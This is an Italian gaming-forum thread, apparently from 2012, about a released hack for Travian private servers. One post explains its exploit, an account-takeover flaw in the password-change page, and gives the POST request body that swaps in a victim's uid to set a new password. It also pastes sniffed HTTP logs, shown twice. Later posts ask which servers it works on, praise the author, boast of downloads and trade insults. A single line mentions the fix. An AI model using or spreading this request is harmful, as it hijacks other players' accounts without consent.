[REL] TRAVIAN PServer Cheats HACK

diddo · 8 Luglio 2012

credo di aver capito l'exploit xD praticamente con questo programma lui logga nell'account che gli date poi si sposta nella path /spieler.php?s=3 ( per chi non lo sapesse è dove si può cambiare pwd / email / deltare acco ) poi se vi ricordate vi chiede l'uid + password. poi fa una richiesta POST sempre alla path di prima ( /spieler.php?s=3 ) ma invece di mettere l'uid dell'account loggato mette l'uid che gli avete inserito voi quindi dell'account di cui volete la password !!! e ovviamente la nuova password della vittima (pw2 e pw3 ) !!!!

ft=p3&uid=7&pw1=pwold&pw2=pwnuova&pw3=pwnuova&email_alt=&email_neu=&v1=&del=0&del_pw=&s1.x=0&s1.y=0

ho testato manualmente modificnado le richieste ed effettivamente funziona , exploit banale ma efficace xD per chi non avesse capito na mazza ecco l'http log saltato fuori dallo sniffing mentre l'hack lavorava xD

byeZZZ

GET /login.php HTTP/1.1

Host: solartravian.altervista.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 08 Jul 2012 14:03:22 GMT

Server: Apache

Set-Cookie: PHPSESSID=p0rifibq41mblic3ksmkuq62e1; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 3355

Keep-Alive: timeout=1, max=100

Connection: Keep-Alive

Content-Type: text/html

<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>

<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>

<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>

<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>

<div id="content" class="login">

<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>

<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>

<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />

<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>

<p class="btn">
.
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>

</form>
</div>
<div id="side_info" class="outgame">
...</div>

<div class="clear"></div>
...</div>

...<div class="footer-stopper outgame"></div>
<div class="clear"></div>

<div id="footer">

....<div id="mfoot">

.....<div class="footer-menu">

.........<center><br />

.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>

.............</div>

.........</div></center>

....<div id="cfoot">

.........</div>

...</div>

..</div><div id="ce"></div>
</body>
</html>
GET /login.php HTTP/1.1

Host: solartravian.altervista.org

HTTP/1.1 200 OK

Date: Sun, 08 Jul 2012 14:03:22 GMT

Server: Apache

Set-Cookie: PHPSESSID=8q6j1nrsnd3nlkoc838pki5741; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 3355

Content-Type: text/html

<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>

<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>

<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>

<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>

<div id="content" class="login">

<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>

<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>

<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />

<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>

<p class="btn">
.
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>

</form>
</div>
<div id="side_info" class="outgame">
...</div>

<div class="clear"></div>
...</div>

...<div class="footer-stopper outgame"></div>
<div class="clear"></div>

<div id="footer">

....<div id="mfoot">

.....<div class="footer-menu">

.........<center><br />

.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>

.............</div>

.........</div></center>

....<div id="cfoot">

.........</div>

...</div>

..</div><div id="ce"></div>
</body>
</html>

il fix pe chi sa codare php dovrebbe venire da se xD basta che checkate che l'uid immesso corrispondi con l'utente attualmente loggato !!!!!!!

MissingMetin · 8 Luglio 2012

Ma la posti sta spiegazione o no ?

diddo · 8 Luglio 2012

MissingMetin ha detto:
Ma la posti sta spiegazione o no ?

se è quello che ho capito io l'ho postata io sopra xD

text · 9 Luglio 2012

Reminder95 ha detto:
credo di aver capito l'exploit xD praticamente con questo programma lui logga nell'account che gli date poi si sposta nella path /spieler.php?s=3 ( per chi non lo sapesse è dove si può cambiare pwd / email / deltare acco ) poi se vi ricordate vi chiede l'uid + password. poi fa una richiesta POST sempre alla path di prima ( /spieler.php?s=3 ) ma invece di mettere l'uid dell'account loggato mette l'uid che gli avete inserito voi quindi dell'account di cui volete la password !!! e ovviamente la nuova password della vittima (pw2 e pw3 ) !!!!

ho testato manualmente modificnado le richieste ed effettivamente funziona , exploit banale ma efficace xD per chi non avesse capito na mazza ecco l'http log saltato fuori dallo sniffing mentre l'hack lavorava xD

byeZZZ

GET /login.php HTTP/1.1

Host: solartravian.altervista.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 08 Jul 2012 14:03:22 GMT

Server: Apache

Set-Cookie: PHPSESSID=p0rifibq41mblic3ksmkuq62e1; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 3355

Keep-Alive: timeout=1, max=100

Connection: Keep-Alive

Content-Type: text/html

<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>

<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>

<body>
<div id="side_navi">
<a rel="nofollow" id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>

<p><a rel="nofollow" href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>

<div id="content" class="login">

<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>

<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>

<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />

<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>

<p class="btn">
.
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>

</form>
</div>
<div id="side_info" class="outgame">
...</div>

<div class="clear"></div>
...</div>

...<div class="footer-stopper outgame"></div>
<div class="clear"></div>

<div id="footer">

....<div id="mfoot">

.....<div class="footer-menu">

.........<center><br />

.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>

.............</div>

.........</div></center>

....<div id="cfoot">

.........</div>

...</div>

..</div><div id="ce"></div>
</body>
</html>
GET /login.php HTTP/1.1

Host: solartravian.altervista.org

HTTP/1.1 200 OK

Date: Sun, 08 Jul 2012 14:03:22 GMT

Server: Apache

Set-Cookie: PHPSESSID=8q6j1nrsnd3nlkoc838pki5741; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 3355

Content-Type: text/html

<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>

<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>

<body>
<div id="side_navi">
<a rel="nofollow" id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>

<p><a rel="nofollow" href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>

<div id="content" class="login">

<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>

<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>

<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />

<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>

<p class="btn">
.
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>

</form>
</div>
<div id="side_info" class="outgame">
...</div>

<div class="clear"></div>
...</div>

...<div class="footer-stopper outgame"></div>
<div class="clear"></div>

<div id="footer">

....<div id="mfoot">

.....<div class="footer-menu">

.........<center><br />

.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>

.............</div>

.........</div></center>

....<div id="cfoot">

.........</div>

...</div>

..</div><div id="ce"></div>
</body>
</html>

il fix pe chi sa codare php dovrebbe venire da se xD basta che checkate che l'uid immesso corrispondi con l'utente attualmente loggato !!!!!!!

Questa è la gente che mi piace!
Bravo ragazzo!!!!

4NDR3A · 9 Luglio 2012

a me neanche si apre il programma

text · 9 Luglio 2012

Che Sistema Operativo hai?
Devi avere Win7 causa protezioni maniache di Predator :asd:

diddo · 9 Luglio 2012

Errør218 ha detto:
Che Sistema Operativo hai?
Devi avere Win7 causa protezioni maniache di Predator

io ho vista e funziona benissimo xD

text · 9 Luglio 2012

Boh sinceramente non so cos'è che da problemi...
In ogni caso mi piacerebbe averti su skype...
Ti invio il contato in pm

Wahvian · 9 Luglio 2012

Quanto costano i file fixati?

Darkomega · 9 Luglio 2012

Mi potete dare dei siti di server privati di travian in cui questo Hack funzioni?

Predator · 9 Luglio 2012

Suggerimento: Richiede Framework 4.0 magari qualcuno ha solo il 3.5

SexDream · 9 Luglio 2012

Errør218 ha detto:
Strano

- - - Updated - - -

Io zappo la terra da quando tu avevi ancora il latte in bocca.
Penso che tu non sappia nemmeno la differenza fra una zappa e un magaglio.

Non ho alcun dubbio che sai zappare la terra
La differenza fra una zappa e un magaglio sinceramente non so manco cosa sono e non lo voglio sapere

Mi sa che la frase ''andate a zappare la terra'' tu non l'abbia proprio capita ma vabbè dettagli
Owned cosa? Sei un cojone che non sa come andare avanti (ma tranquillo non sei il solo )
Potrei continuare a scrivere fino all'infinito ma tempo gia ne ho perso troppo con un tipo come te

text · 9 Luglio 2012

Tu mi dici di zappare la terra che non conosci nemmeno la differenza fra magaglio e zappa?
Ma fammi il piacere!

Darkomega · 10 Luglio 2012

Mi date un sito dove funziona questo hack?Tnx

GsNrg · 12 Luglio 2012

Darkomega ha detto:
Mi date un sito dove funziona questo hack?Tnx

Ecco i primi bimbi che si divertiranno utilizzando l'hack.. :asd:

Error218, come sempre fai buoni lavori

text · 14 Luglio 2012

Merci!

Gigabyte · 16 Luglio 2012

Ma è un nabbo, lasciatelo perdere.. Error sei un nabbo, vai tu a zappare la terra, hai rovinato un bellissimo gioco!

Con affetto, Rix.

~ Gigabyte

PS: Ovviamente il commento è ironico, bella Error :3

Predator · 16 Luglio 2012

avete qualcosa contro i contadini?

Gigabyte · 16 Luglio 2012

Predator ha detto:
avete qualcosa contro i contadini?

Da contadino ti rispondo: no!

text · 17 Luglio 2012

E' un mio amico, scherza x'D
Comunque ci sono stati ben 150 download unici

Wahvian · 17 Luglio 2012

WoW peccato per il fix xD

Jack Pot · 20 Luglio 2012

Ottimo direi!
Complimenti Error!

text · 20 Luglio 2012

Merci C:

Momenzz · 4 Agosto 2012

sei un figoooooo ti ho pure dato reputazione

Valley · 5 Agosto 2012

Io sto studiando agraria, chi odia i contadini? :megaomg:

Lo sai che se mangi è grazie a loro? :megaomg:

XD

Cerca

[REL] TRAVIAN PServer Cheats HACK

diddo

MissingMetin

diddo

text

4NDR3A

text

diddo

text

Wahvian

Darkomega

Predator

SexDream

text

Darkomega

GsNrg

text

Gigabyte

Predator

Gigabyte

text

Wahvian

Jack Pot

text

Momenzz

Valley

DISCUSSIONI SIMILI